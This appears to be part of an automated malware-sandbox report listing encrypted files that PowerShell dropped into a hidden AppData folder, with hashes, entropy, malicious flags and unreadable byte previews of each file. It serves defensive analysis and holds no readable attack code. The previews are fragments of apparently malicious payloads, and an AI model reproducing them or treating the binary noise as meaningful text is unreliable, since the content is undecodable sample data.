Preview:	@..~E\+..;t.........m.Y1+.....0.6..5E...[,].9.9..5...=.....9;`eWt,h.X...n...=..E."L\!}..V.3L3.......\|..9..D.+.m).R....5.#oW\ZZ..2..7.......O8l.9..J.I......4(.5:.j.H6\...{.<....Q..>./.g....t3..\|...X.4W.0...W1k.Z.%.}..0......A..,u..^.UG.~`.O...r..............\|....J&....PEC~..&3CB..l..m++.gJT..4.'h..6'8...-=.....n\|.K.P.ar......j..@..D....@.5..wo^a;p..q/.KO..X%.......8Eo..Ps=.S..S.\|.q.....c..r.i.x...(... ....An....3..v?.X..6..N....}...1...tg.m.b.Ni!.V...+...6E.}..........y.<...w.L~l/.rQ]..f.=!2...g..s..#..N.\|6.#.Po.EEOO.C.WQ7....T.q.t..n.vZ#.(..).>f...0.B.!KF....7..7..u./ ./AC.......\..+..%.]....'........s.pT..I.h.... ....`....V.^(..z..B....0.^S...mo.6.........B.!0q.B ....\.0S.4..]!.B.8.. W......-.n..~..C`.{.$..-.!..8....N..3..YR...]hS. ......!f....B...E....d7j.~HvFa~i...o5y.....A.R....../<.^..PMGPQ..$..L.E..._a...8O.......s...xb....-......G.+\....U..;zR9..O{.X./w..:.E..x(..H.A.ci2...q...4g.)oS.....m....R.^.`..).a..cu.x.m....M.T..."v..`.e[k&.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\PXrHhmDTMRQAvJi.UrHvZEsygYOBXRL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	95074
Entropy (8bit):	7.9982327540611555
Encrypted:	true
SSDEEP:	1536:guE6J/LRz8zYx9C9TnZgKopE90lHc1P9xlzdixcbPLkSlRJOgiCIAse8LUJ9yGqL:dld8zYTC9J2E9iHgRxixuPmC0LUJ9EL/
MD5:	875052025878C5D50E820E0DBA23EB1F
SHA1:	95583ED97B20104FFFC2B1DABEE6F7FE73E2ACF4
SHA-256:	154E95CA33CE0B0F109FB6564A35795F4F69A26A13A4AB8AE175DE9B4A38D0BD
SHA-512:	3ABD439A224F7E6955BB4B67A24D49D404C539AF7EF67569F048E3096C758C69BE92708880F9CFD27497D071371D1100A63BCFC7C9DD6D35A86B44F66629F55E
Malicious:	true
Reputation:	unknown
Preview:	BA........[....5.9.p.......&..6].[.....T...B."...>.31."...a{.,kH..7.g..q.......?...).^.x..!.n...WGg..w..vHJ&k........\|.2..kO6E8L..R K..)gZ.;R-....n........r@....2u.D....\ev....!A.7c...j.6.....)xl.OZ.v\|[$De?.2\|vQ.,.v.).h....BRLh3BW._.... +.......O.{.`.....a...x.9..o..nEe.<.....'l.f.....+/I..90..u.../.62......C...H.(..".>......y.}R..wc...nF..fD..RLa..:S;...@.o=]T&=..."r....Y....,..Z..E.k.o.......9....[F.z.BC/B....../4-t.. +2G...c.....$...vk+q.0...#r.S.<..;..3Ta;...$........s..]/...YP@.R...v."...r.....5.3.]. A.@..qM}.....;.....D;;2.i.\...8.5..eK4...!1.MN.O3......q..2 y+.v.m\.....-..VZ.".S. .7...N+w..<fo..,.2........&L.Y.5E.Klr..$...9.p..(.%hi..=g.w.g...V....G>.-....l..o...../...{e.../...).)........-.y.B[.K%..F.&Z....E...;...,..k.F.....Bt....hjb.#`G.W}<}.....p.....w.+.8....)L.?C...$..r83....".0.h....O..._.SO\Xr.h}....k..A?....zJ]X.^..j#...-...i...X..t....c.[.......h...0..[.%.+F..sU..G}........p{J......l+{......z..8s ..!I..?.$.!...@..g....

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\PxhiIymLHUC.SMJEvXONlokPpHYmAx Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	135224
Entropy (8bit):	7.998478452108288
Encrypted:	true
SSDEEP:	3072:WfHR0oSh7R57ZqSABxw2VNB5Fqzn33PjJdEnuRUCPBuVFGSB:UHR0oKMO2VNJqznLJdkuRi
MD5:	D781BA25F43A77A11C620BF974C9145B
SHA1:	01DCFD8E02A4A842C612A9801595D98D8CBBCF59
SHA-256:	21F54AD165DD023A600F74BCFF5D2ADD39783FCCE2583459EFFF95113902F07E
SHA-512:	A9034F5CE2AC9B6E6C475F06EDCB2F576256F2DB5BE509FF4F0A9086B4FDD632AD3F3E9137D29E6EE9C55C3439CBDD79EADBA100BBF89F0BBB8761C519D1D403
Malicious:	false
Reputation:	unknown
Preview:	PI..qH/.f...p."0..3........U-.......C..mA.....o.gw..\|.EB.+.......W....6;.0.........d..Skc...0....0...\|ug.[6Q....R.@.v.=5.r@VfbEG..[.4......e......d^....;.....n..I..'.z......u..5.}.b......,.,.s..5g_[.......p../.C\.E..I.....R....N.`!.q.m..A.4..0..F;...e..x..k....z...L.......i:...JNd]:...c..v"...n.F.$pb...............L....;.....&O$.<..#..\|..q...h...X.DhG.'m.f\..^\|eGW!...a..'de..F..$..n..Y... ...Y.a.~weGA.. 6... Jk.h..st.....d%gP...4....@.O.".."c.R.^...~=dZ_.....L...H$.....y..z..K..h@q.T..=Z..x....e....~W..>?..fS...G..4.hU...o.......b...c..O..$D"...q.C...e.\.....f......k..k.nd.+...Bski".5..+.,pL.'~4..{...h=....1....2.=...z.@,....<]....in.........#.,AH......C...:.l.W.T=.....F...-....7..u..E....J....5...A.Y:.~./7......h..F.e.9.......7.m,%Qm..kT.8.2..S...Z af..Z$.~{....s.3..[R..Un...9.......34.F.D.:...y..],....{.pQ.&h.p...'l..$....Ci...aH..6....j.b.../AQt.]..+...^.J.b........,<..o2..:.PG...wS.2.....O8.-.W..!N...........^Y.. .~..n^.....^.Z.c

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\QFrtBRTzCJSbDqXfcUa.fxcqoAIKPdRJepOZDm Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	194124
Entropy (8bit):	7.998960849862556
Encrypted:	true
SSDEEP:	3072:VH9AycJOZ1FP9DPwRekoG0X/M2QjB8BGo5MW8sSLF2wesXDe++4kRUUB/TnyjCde:VdXSOZj1DK8M3jyBHCW8sSgwesftupT2
MD5:	BA7B03DEEB5481C9849767AFDC281573
SHA1:	945D0C088E50A696086E20BC616C9DC1C04538AC
SHA-256:	542A3FEB5FEA9DA0F09F7F3827DCEA632521A79B924C3EA338A5FAE9D21D81D1
SHA-512:	3D26ADCCA84F59C6788850D0A542B2657515F9D00A6F278252EE89F4EC9D1029901092432C6DE1582A567CD72126CE78ADE2B10CD728BB11DC4CBD0B7740853C
Malicious:	true
Reputation:	unknown
Preview:	..@..?..!....K$..2...w...$. c`...n..9W..........Q?..T"...1.J..+.k7......7DM<. ......^.o\|........dE..`:..h...!...d.#"../=..A#.L...W.[.?O..z....>TG.@"<.0..[..._nF...y....L.......I.z..W.^.....k..<..3..l.>..>Np.....>^....U.'.].]%+.......n .s.r.....\|..........J...,.........B;M.....1.q..}...(...xu6!.....y..n.7...(.,.`ivn.`\..[...i.l~..<D.o{,...MH...<]j...x.....!d.o.......VQE.....D.O.[/h........+0 .c..P2.......Y...)UBp.7d,d...:...#..3...p.`'.8.Y......,>r.-.T........X.....U:AMI...t...v.\C..\.%V.....~.......e....."E......I\|.....RTW....h...W..}.....9k....g.....s..]M..6V.v.7.{6-...=..F.G.<<.F.E.MM.n.a....\~U..1e.\X..Q.....J..z;-~....`8....!.paH.`..7.....b.......... .........=..F.F.g..\|....%3W.+.d..X....Q.....Fl.fC".J5......GU.m.q.H....x.X....-...a.kq].R.?..n..h2..\......')...=..+o~z...N.~#...O..>...u..+_S821@.n...J...Tr..\|.... .s^-..y.[...PL.1$...zh.....(....S.2.vA..SVz.k>".Ko#...z...Q.....>.....#.o%k....'...l.S...+.l...{...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\QhaeOorIzFxLByVc.AUEiDmCSpjgvQaTk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	176842
Entropy (8bit):	7.999014576142251
Encrypted:	true
SSDEEP:	3072:s8QD/G+KTVsaitSwlWxfruzFeqxQpY4U1K2mRh3qOVX/Bk0ShVeuwPg5h0C87i4:4TjKB8Qwliruzgqx+AK2mRYsvBknVeuo
MD5:	DE12225137ADB6BE924963BE1ECFB5FA
SHA1:	D61A8C062375DE3E40AADB889C43A69120DEB48B
SHA-256:	56C2E95107DBB3F62DBC040054B23B12573FFC6D249427FA6124A12267F476E9
SHA-512:	ABB472C49560BA70472DEC87525B7A2040494CF7B38CF6E482F47CD2863FF758981E310827B5BB84E8FE0A8BFC30BD5E4BE939F87063ACF86236DE8C534679FE
Malicious:	true
Reputation:	unknown
Preview:	FD....K...E.:`D..o.]l}.M6.x.@...,....d.5.$...F....3F..W.$...k........{v...sIZ@...Q.'.K6..,...-.<.x4(>..:.X..IR..n...h.}..yX.H6........=.o...O.2^[.....S...t.~{.fF......C...j&.....X....(+.m.`.\|..Q....-'...miWM...8.%Xs.....h..../F..0>..T..{.[.#C.......o...hN..yOeY.7.....B..#E.f...XQ..(..d....?.fI.\.M.G..,w..#s...e....d.B...@Q........;.e.s.@.T.c.._ze.tU.../.%X.'.x .z...@........x.].iBw9/R/.y.......S^.%.<..W3.....;5..K..$.V.P...(.....C^..u..j..s..\|.E.s]................\wFBtU1.....u..G...W~.L.....v.=&1...f.]jM.y...E..l.2Tm.w+a$..a.j.s....dE`.ol...r................y.,I.f..c..j."I.}.....[......].4..}.}o..`.~.ucW.U.y.....x..HcE.nZ..q..%..}..QezL.....8.......z.K.....n?.Te9...'L...}..v"....4>.Ic..?I.uA............e....V.1....s...[.s..:.#.y.-.e.....P...V.x......\|}UR.S..:.. ..l.T.C..e.......?58.0..5.z^C.R..F..?...w.?...m.\....;..S7e!.K6..q..W.m-....)..M....0gJ.6`.U.....Q.N.M{.n....(.t.?.A.z.b.! ..."[...f...7ya...7...W....G_^.-.._bxn..F...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\QwgDzNimfFkrC.rZJhVMnXWY Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	115577
Entropy (8bit):	7.998386920098002
Encrypted:	true
SSDEEP:	3072:TRdImy3UHENQWHKnQJEq7ltdrRbk6UmS1/IZMPcgiFB80Rcq:tdIJ3/NLKnQJN/dlbjTn80Kq
MD5:	9BFBB6C6BC7C9C1255B109979B7B8707
SHA1:	D81F0B58FF72954B9B338F8016BA55BFD014ADC4
SHA-256:	310B3DC2F5EEB36DACCD00595B0B49192F53F6EB956A402E114A942A41E352D0
SHA-512:	B5D961D6F16E4694A7ADCC9794E46C359FA08767BE256180564D26C27A122DE76CF8EFFBC3B9DC2F3F7BFDE4C8E217421E2E65294118182F91CF5BBACE998876
Malicious:	true
Reputation:	unknown
Preview:	.f.m0I.2...'9.hV.n.>&'!Al..(C./"....t...i...X.n./r"E.D..O8d..R.0..RK...R..&....&t...x.~s..R..u...df.y......_p\|.D.....m{.....5n.B\..S.....e.\|....:..6.3.p.FG...e.'J...-.b....+....'..M).iqp..D.LU..L...fOD.2.......=.........O.P....D..>O....~V.?=K.m.D{.Ihtt.P..A..D.C..9.N.QD...Z.....S..l=..[9!,<.....+..._?.._.RL..e.7..Z.^...$..3.....H.^.sh.j...i...8..1..4!.e...+8.O....J.pn.l].'..1...... ..}GYl.>.j.c..@.8Q.......0\..&j...C...-.$.-.x......<d.s.w.l..<...!.:.H\Cm/..R.#..\|V..U..?`N.(dp...P.gG.9.....O......1.%.`.=.....]8..4..^q.R..3u...<...l........l...h.)..!.Pv..Y..>g.5M@..p..OJ...i...K(g...9..lU!.K(....b.5X._.......?.q......(.4..N.....1k..f_.e..U:..kc..[.Y.].vV6.4....#..&sE].M.@.(.R.n.dc.{..@.(.1..H0.(e=9..~........J.k..al.s2541....}?j.4.f..x.'..;....m..c.M.8.~K.8...]@....S..4.^..~.,....Xl+-.LeJ..`...f.M..B.o%.W5.B...+...`c....,......T..G...#."...\.b.......+W.)......S.....X.V..rM....8S...f...5.....x[....x.MA.nH.U.-R .G.}.;....D,...$....sU

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\SePJsnlDXipVQhubE.RNmACDSdYevk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	58365
Entropy (8bit):	7.996472798317936
Encrypted:	true
SSDEEP:	1536:iApG5r4iY6sNjpwV2JJzjuh9vZ8OBYpyLcAQRG:iAQ5r4iY6sFq0Jluh9vKOBYpOca
MD5:	AFCEDA672E480FBD6E102BAEFD0E4486
SHA1:	AC7862786C8F4238F695A053CB2218EF87AB7CA9
SHA-256:	D29828870BFD7585F0CA6AA542669EBE975CB6C4A0A9CA9CCAD920F5F20F3A93
SHA-512:	70638723BE02BBE9DAADA96AB40E1E52341569DB69B2E40D1B92F2A94859E7D97AEB626D6E52598B2886EFF9FD74EA8E7838D54372299D8359588DE3129845EB
Malicious:	true
Reputation:	unknown
Preview:	..S..I..X..A.W..eP:...BC+..X.1...-..#.=...R=]...{x.@..i...d...&..)....Z..Z...?.E...[<Y...&o.+>.`K3..........z.m...9..$:4."..(@\|..[%..II..<..V.8....o.. ..F...m.)H..J.;9.....p.D...V{.H..yh\|B..>.-u5.hm....)1.q.H1ZZ].........I...WXEX.....Qt........z".....(..5fvb...P.../.U\...3.fe...5....(..%..._.......K^k?....y.G]..fE.q.'..8N...\.Wv....}.Qw..M.".O>{.....2..%.fa.x.]..L.0 7z.....P...}....,.F......k.\|.v>.Gi.a.....SN0.e<y.~4....).8_.m=...H."..0.e..v...v!.CAA.1...Q2........).....,..L.xWDgoI.I.y.3......\m_e=UY1..TG....^f.U....-Ti..#..\.T....=\..y.&M..a..r...H.(... 1..<.x.Ew..r...........%..f..uP....FP..+.Z...".'...E>l.B...".(.5..P.uT.?.6A$...M7;.k.}c..<y...k...>...]....`.8..U......\.t9...H.r...v1"....M..k.b.(T.i.4...w.c...q1..c.6.U.4n.%. .GJ3.A.B0...T......R..\..<...>QHB.d.=G..`3.-.P. Js..^....b...x....o..p.8%.Fo..L\|a.1..vy!..:....u.?./...%u.>....6{G..iC.. ..\.....s.1...2....%...Vm...5.....0.D.........6.".......R......S...p.h....

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\SutRWdXneb.kQeoTtsIhgxalfyZBn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	108128
Entropy (8bit):	7.998245634283852
Encrypted:	true
SSDEEP:	3072:M6j7Wpqzjqb5HFbsAH+TUys0eM8LdrbtHp+:M2zzmFTe1Ixx8
MD5:	8689B2A3D381F186128CAF7470344F7F
SHA1:	9590460EDDC9A0E1FD9DBC2F71B8F297E8DF0A99
SHA-256:	0F09B6B7D36FFB75FA8C7207245E2E5BA67A838C59B8F113D31DC4EBFB08E2D1
SHA-512:	32DF4C37B5559E7A800B0BE1ACF5048B29D1A1944B26454C05F283CB6AD8D0692CDBE0396A989BB60ABF6AB2708C8A128DC0611D353B8A59451F47ACB30E9C51
Malicious:	false
Reputation:	unknown
Preview:	.jO[.....9....Ou.........U......$..Zp..wmAx.].eF9\|b.$TlV.1..p\|..^..V.~.6......a~..?3.o..y..5...b1.....fs....&..2).<...7G...+.U..)..t.bA.b"..R.......N..B:\|`:r...hZ>....U....N.+...R.;...a....!.7.{.....j....^-..t.c..`.,...9...>.8...?B.....:....;AU..7..t.....h.<IF...}.)....26kcB.z..BPW.Zp.H#..jevc.8......,qw.VR..:u.._........(......i.W.pW.."....0.r..!... ......}G.".V...B.........L,.l.n.J63.TD@zu.K.^...<\}j#.%....k{...4.v.\._.-xp.Z.C..r.[.xc...H\|...._.).Ot.n...n..dq..\\....e......RHp.7...=n..[.n...J..am..U.;........(RA9.............M%=...YiLR.(F.\| 40.g:.P.;...4..^..NPi~Y.......#...l...M.EVJ..,.d.l+...A.p......n0Y..o....H..!..5......(..%..7gP.....l...........k.8.^.....y. ..6.{...Pta.0.../.r</2P.E..vk.......d1..U~....'.J.....~../N=k.%.@......dg..dN....Df..w.A.%/.~.\~L .KA....D.."I.wuL..l.!Kh......f..-.\|..f3.b...D..1.{..5....~.Z(U.1...o.VK8..TI.\|....M7..\|.Y..f\|9.....!..$..!....{...Gj....}l..b...4.........s..3R..7X...U\`....Z..\|.l..i.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\TAMQwksfxy.SGPNoTUnQVMYxwvlA Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	59932
Entropy (8bit):	7.997151366938617
Encrypted:	true
SSDEEP:	1536:NDlJxnigKUUWtrdB6Au3hLAaLF5VobdBN+W5P6Lac:NDlJxnigK3WBd83tJLloV+W90
MD5:	1013F789DC9199DD16FF2B673DCF1D3B
SHA1:	FBB3440338C2FDDE1685273C07B85E154A19B074
SHA-256:	992743700536B9468930AF13918F69A1591355C26FBBEE54E1504EBBB41A3174
SHA-512:	6AE6385BFDCB51CFE9F57DF4DF92021E45D39E113F16D29F55B81A707818D2F6940C245EB13766AC4E71F96213AAC892B2D8BAEF083694E4BB739F0203232DEE
Malicious:	true
Reputation:	unknown
Preview:	D...H..v`.e...%.......Br.....z....2R..-.,....#.~).p&.....[...i. '..ZJ'..9.e(....r.\|..%.+2H...U7..w..#.{.[.. .eIP.Q..H../...4.<-.!...N..{\|.OcM....3.JLOv.E...'.H..C.P.2..e.[.4.K..fQ8..$N.Y.d.U..qi.P~..X]..2..\|......5q......u.x.w.vqQ...M...Ga....c4..{.'..1.h.M../aNW/.n$..k...._C....)U..>.`K..wxG.....F.1...U/.9.W.hf.......I..jc....~..ey.5.?..']U....\|....g..[...j.U..)......^.[Q......V...1Lx2..\|D'.z.H.R6o.. 1/..,..G......L^....3By...?t..........5.Zc.~......K.^)..T.4#... .....J..{..:.....].M...-f6].6^.dO.:...#...)..$Zs?..S.?.;...E.\|.L.p\|.[...u..`...k..8.q.B.~.....@.K....f....YEO..}KN.D..g...=`.;...h...u>4;.......vv.3p..R.)....=..c....70.E..3nK.9..5.Y]".......Hxf..f...?#uA...l...~3....jc.......,....9.6...ph?..,..2...../f.3G<&?....x................0:.....m.I)P...O6.2....^.TRL\|Q*..b...-.&`......p.......E;.Z![..M..@EG....>...N.o...J?O....Y.?...24.).2.(..6g.i.PF.....q...@s.'..ih......zc.YT...3q.0..v%...k...=.3...m+.dkU..,.E..z.Q..?.82a`.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\TUqOaEPgceRuN.dfnvcUCjMN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	150457
Entropy (8bit):	7.998697339063939
Encrypted:	true
SSDEEP:	3072:Mwc3WGwzL6M2ZWtLt9S5NCq8uKGaW7uhJFE/xdDMrTAcR08aXl:Mwc3WtWNWtLt9eJK7Wu6DYrEcR0pXl
MD5:	A892E153A343B03CA9D63BA53F7DEF24
SHA1:	CD55C6AA7D5768EC6729095AAD811634264D02A5
SHA-256:	CA58964682A2A26FADED039B5F69A2B57C4D6901F3205FEA99908A27A9482EA2
SHA-512:	FE9F71329D8C1D62FAAD7624BF565A3AB41CB91F7372CBEA4C813793EEAC68B64D2BC1432418C307EBF028B73BD2ED1665AB302654C1854EE7DE5688FC2884E7
Malicious:	true
Reputation:	unknown
Preview:	...d.(.....k.`o.^...w.\|v.%..M.O.;N...Y......s(%.....6._a.._......V".PH..u.\|....X..9...&J;.!x.T...o...z..k..^}...r..!.pq......(.f...Hk...5F.+.H..V..}..........C..r..(~..A.j..0.+\jF...........u..sj..w..R;......U.o.w...\....'.f..=.l.$..s..........4k.~I....W..... S...@4.z.!K..:.y..y.Q^i..Q.A.\u....,=..W.{....1:.3-.g9.B.1\.y.a;43x.\.d..{.0.[l..".W..V..N...i..Z.c.....W..[.>...V..!.rb..?....... E......,.......nv+...j.LC..[....(.......&..e.u...4m9.S.V......._........;...=R.d.`...{6.)'2.......y....BK..8p..{.:..0.K..w.j..P2.........K7.d.,u...K{....1i.7Jfe.Ft.a......f..K..@....C.I..\|....~...F.....m.e.tt..`.P0...l..p.....i\|.p..p0..I....A.Og...R....BQ.....b]..<."..]..L...M.]z.`.~T..n..../....cQ.4......&..Luh.>n..+5.C..._.DO\J.)5,~_..S..o.I....&..8.../#'..;.N.RK3...T?.F>......(R....;N<l0Q..!W.nR>...H`.r.nqI.m.....?..q.....?.i.o.V...z`6...."s.2Q%^f/..WE.9.C3j...5...]}0..u....`..T?...A.....H>....6&.3.=..8.E..b.Pk..;......\|].9.*...x..M.....a.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\UAwDrBfIaMbqHGjx.vcCtaQnOSXrNiP Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	175963
Entropy (8bit):	7.998986187508726
Encrypted:	true
SSDEEP:	3072:+zg+pPYoS9bQFV6hgKPx4PytckTIl5UE/QwPScNenKw7Ku5oBDsp58YCODjsiZ:4pXS9bVPLckG5pYsNR+x5rgiZ
MD5:	C1D847D377165349A0A7347F3AB38E18
SHA1:	74BCE83EE1F8C54BD09E7408CCD4D4F98C673F03
SHA-256:	80560FEE04617C676CA1393804E302652E3D8062D2DF126A792B0A7B8A2E1054
SHA-512:	93E5E05DAFC7B0A5D7C97DF7C7B084CEC10FC8D8B31887F647B6F0F22B5BF80CD6AE365B6B40BB06FFD1FBF6B6E076AF31AD2DC94ADF2B15FD0F0D278F8FF6DD
Malicious:	true
Reputation:	unknown
Preview:	4..,,.....xn.../.S9e........q.......,t....Yt..R....a#..cj.xK...+.\..P.K].Ym.W..a...'C....1.\}O..LH..Z......Ky.r!.D.....\...@..Nd.c..6....?1G.d&O;f.u.f`.d@_...#6T...b..S..Z....R..zB......1h.....N.OT.....JP.......e..LR.K.x.{..!....d%.".........s...6.6..S4.+./.....hCQ(U..??........i....^.5R.x.JR.Ih.....bf....=.#eg.t..XE9.G.A).I..f].R.l/a.Y..:.&...D..X......Qx........h...>..]T.It.yg.7..PL..e..3_.s....-..Rb..gH}.. ..R..?..k(..X.<-r..:.lp...=.....Bx!....J...7.+..5.g.2.s.w.{U...D............@.l.S%N-.F?a.g.....v..g.m....g.uk7r.KL....}.<t..`.....t.^..BiW..7./"...'..(.@0-c.u........cc....Q.P.....K..m..s..A;..lZ....F..L..k.......w..?....D\ZS..q...!..1ss...I+..&...R_..@V;..P......vrF.......<.3c...oS..Bg[."....DW,2yV..A......M.(o?.w]..3.....n..n.v...A`.I.Y...6.. ^.....EK.EZ.m.....>..8I....,...M......v~...`...._.s_....f....N.H.yy..:.6..`%;.i.z.<.\`...z.W...j.9.IBd..<.:$....zXBGmU.\.......#.%...]:.\|%.D....l.X#..g.}E.g\F.^.....A.....d...>-.m.x..2^.m.A5..>z.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\UXAKdMsStjxqIEF.NBUnYIHlWwxGOkc Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	77130
Entropy (8bit):	7.997762329727978
Encrypted:	true
SSDEEP:	1536:idTZgsdq07Og+Y+NScHNgt2RcH8ojZ/sZNdsgdu+0gWIGSI57l:idTydJgSNSqXRccsazsqWIGz
MD5:	932F40B7AA8BF743EC42700DCCD93D5E
SHA1:	EEB76BA6C6126F819CF348448A94A568C2C49BD0
SHA-256:	9FB7231A71E412691C0ACC5A8B4ACB83A11EC9556BA1D51B6620BEA55EBEB78E
SHA-512:	A668F6CD4373787EC6956434A70817ECA9A7D716FD2495F5FA3EA532C3A2B0FECB1402970C6A5FA0761055979C8C7EC4E976F8AD938DC0874AD2DDB916F946B8
Malicious:	true
Reputation:	unknown
Preview:	...7...<.\.E6.......29..e.H..J....K.....Cr.x.4.4E..C3z+\..<},.+.xH.7.h..N...\.....r..j..C.......F!..R......-Q%.@...p.p{...5..U.....s.....a...H..rKh..Mx~...t.t.i1VS.F..W\..x..#\|.P.U.C....;.g..,._....t..T.=....nr.7..[..Q.t...X^h.!.G.n.@a.-iM.0os.u._@.l.T ..Y\nrV.L.p.{..S.#Y'+..p...GR$.6MV{...........D..IX-..?.X..M....t-..K>db0...l....Z~.=.WJ;.d4 ....(~........tdH\|E...x{..k.^d,./B...$D... ...G......%!^n....?u...w.$7..:h...U_.xq....dKN2..&..B.A...>.jl....5..B......~X..0_4.}b....:..N.1..q).."..V/(......;..0!y_t....ee....c<qu&3..H>T.2..z{.................qE..F...c.....E...}C.....,tU.C:p5....\E.......1....Z-..\...sw].Wb5..>..87.....\|..F.B.B..4.............n"..%....x......... ).e..5.Q".. u..L.l.[..Y.......nP...U..q...e.y@.C,..W...vv.TP.....!...\|...C..E@5.A[....^y.........N...}.8.0Y.%.Dt.@`N3....4R...."m{Z.]...x..I.....!.w.y{....HZd.w.7......;M.Y..d.P....c....c....._.fL.n..:;p.!...>..L.k........U`..........P....'.. ....}9Wq......(<....k.G...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\UYALJIZMlcwqmN.qCzRNySdHXZagho Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	154673
Entropy (8bit):	7.998925637029245
Encrypted:	true
SSDEEP:	3072:Oxnjrpb/we13tx0lfIxHvOK1GMbthjK6d2JvnfymJ5omh6tFJ:OxjrZwePxyEZhQ6don93h6tH
MD5:	316741B9BAD06C09BA82174D2E3BCA55
SHA1:	3A53DFE1D6F7AE28DBD838B7960AD172F6E7FAAB
SHA-256:	7A9A6EBE295FB05AA7601B2F6BCA4FCA533A30AAE112A885A1D2C670F13359E6
SHA-512:	612E25B8658FB690474F9E839FA65550124248E674FD4949FEB438984BAE0CE7BCAF6C7545EC305AA25074E95615640CC600DD0920DEBDDC1849DBBAE4DAD792
Malicious:	false
Reputation:	unknown
Preview:	JHr .../.$.....2.......hF........Q...d...:..N.wMc.vV..".e.\/...0...#..vD+....{..}{...x.5./\{3..h.s.iSB.T2+.SA.......d.s....._.mj..)83..M..nzr...DK8\..~.f.X ...~G~b..W.J/....a.q.........I.8A....2.(p_.`.,.......?..6.^.=...ia.....H.L...AZo.QY.....4.b"g...3.......t+VQ...._.?....2...b..".(......)k....S.O5..N......u.'./../#....n^.u.L......[.~.P...X..{...0.x@.,..4..M._s..C.."r,Y..4m.M....;B...g.3.M...F....yK..r....D3R..7...1IU>.....!.}..M.[....."....a....k..;8.:...G..bJH\|4Y2.P.>.5...k...-....i.!..2"c.....L8.h....E2....q.8...k.7..../...1..mu.c..x.R\..5.5...'..5.X.v....&...E.ag.!........4.....@.1Q\|.5..'.b;....#...;....h..m.. ..A....q...t...\|..QSjd....q..o..4.J...2m....i..h/i.<f..........x.2s/....'..uk.?.GQ.s.......v..v...diV....,.g.-\...XM.0.I.I....?L.......4m.P....F..P...&..ao.7..}.E..;..i..[gN>b.a.6..3.@..56....8.M..l..>/(.!...S....kn.2....xm......9-......u`.G"C.K<.Nc...3?....)...qT.v...m...V*..Z5.iL.B..]`.L.(.Q..v.....j..`.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\UwISFRNoVkExWOPpG.bzGtJXfZHKqsRIPODvl Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	196573
Entropy (8bit):	7.999040008731796
Encrypted:	true
SSDEEP:	3072:mi+subOD+HPIEykL58yJRgJhvZh4OD97CnpRU2IM2e1Bzd7E50Ac8Qbv3qKihz:mMubOD+vIi+yJRgJNZzJCnU28e1BR42I
MD5:	90D1C3DE0226CDE05903AF31894E92E1
SHA1:	A65D4235E32D3F3D440D66E00C697BDFEEE6C359
SHA-256:	CE424FB3230919BDAE96DECDE84D5FBECF4A45117F5C47E69452BABECA7FE956
SHA-512:	AD38517C764DB212EB146ACEF9A6C14B47F609DF5D7F84D97761CFE5000F666C33BE62E2B478C7ABB82E13ED9EC96CACED5E6F479A2273A1DA2E79C69552AB87
Malicious:	true
Reputation:	unknown
Preview:	M..p..k>)F......-....,...........l..K...]C.G?Q.4._... .)...#.w..\c^....t..E[.J..Hph%.L{.vR.J:3Q^~.fO...~7..z.o.<.......mlY-.:......Z..K8.v..Jq..lJ..NNl..X.3C.<..M..slH.Pm.l.o...=H}..l.L..e(...:._.......L...I.).9......[..8xo1....c.G{.i.HL...\..Yz.....m.kYh...8..R.C.8T.\L..IH....S..e..^..#k~...g).f7..B..T".... .D._...s(1A.g......4...9.h.D.g...Z..NRa]...z.o@.......h....).u..F.T.`-.p...(..'.R...5....ovU3.eN.(...i.p...>A........%z.\|<.=.P.qmo~.f...-..14q..W...g$xX..4...D.v..7?...g....%...F..I.&..!.a....d.i. 